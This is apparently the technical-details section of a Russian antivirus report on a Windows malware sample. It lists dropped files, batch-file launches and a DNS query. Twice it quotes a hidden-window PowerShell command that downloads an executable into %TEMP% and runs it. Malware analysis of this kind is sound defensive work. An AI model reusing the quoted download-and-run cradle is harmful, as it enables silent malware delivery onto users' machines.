Техническая информация
- $dankv как %temp%\eubsuqqrb.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Wshex([String] $dankv){(New-Object System.Net.WebClient).DownloadFile($dankv,''%TEMP%\Eubsuqqrb.exe'');Start-Process ''%TEMP%\Eubsuqqrb.exe'';}try{Wshex(''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1884
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\sicgyqs2.bat
- %TEMP%\1200521.cvr
- DNS ASK ja###ol.com.pl
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Wshex([String] $dankv){(New-Object System.Net.WebClient).DownloadFile($dankv,''%TEMP%\Eubsuqqrb.exe'');Start-Process ''%TEMP%\Eubsuqqrb.exe'';}try{Wshex(''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Sicgyqs2.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Sicgyqs2.bat" "